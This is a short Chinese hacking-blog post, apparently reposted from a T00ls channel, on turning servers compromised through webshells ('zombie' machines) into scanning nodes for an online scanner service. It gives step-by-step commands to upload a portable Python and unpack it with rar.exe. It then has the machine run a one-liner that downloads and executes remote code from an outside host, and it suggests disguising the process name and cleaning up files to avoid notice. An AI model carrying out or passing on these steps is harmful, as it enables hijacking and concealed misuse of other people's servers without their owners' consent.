webshell的另一用途

  • A+
所属分类:安全文章

不知道大家都用不用www.yascanner.com,旧版是www.bugscan.net。挂载各种插件,不过扫描要添加在线引擎节点。

你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())" 来上线。

我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈

好吧。

这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。

1.选个Python2.7.*的版本下载到本机执行安装,第一步选择Install just for me (not available on Windows Vista) (该步尤为重要!)

2.把一些帮助文档打钩去掉,能省就省。一顿next> finish。

3.把Python2.7文件夹打包,我这里选用winrar,因为体积很大,分卷压缩。


  1. rar a -m0 -v2m d:py.rar c:python2.7*


4.选一个可写的角落,上传所有压缩包和winrar目录下的386K的rar.exe。

5.C:temprar.exe x C:temppy.part01.rar c:temp


OK解压完了 开工。。。

等等,什么删除文件,更换一个有诱惑力的进程名,我这里就不多说了,当然肉鸡有python就更完美了。

webshell下让肉鸡执行



  1. c:temppython.exe -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"

IIS APPPOOL进程该起什么进程名,大家自己琢磨吧。


webshell的另一用途

开扫

webshell的另一用途

进程所属名问题,欢迎大家建议

webshell的另一用途

本文始发于微信公众号(T00ls):webshell的另一用途

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: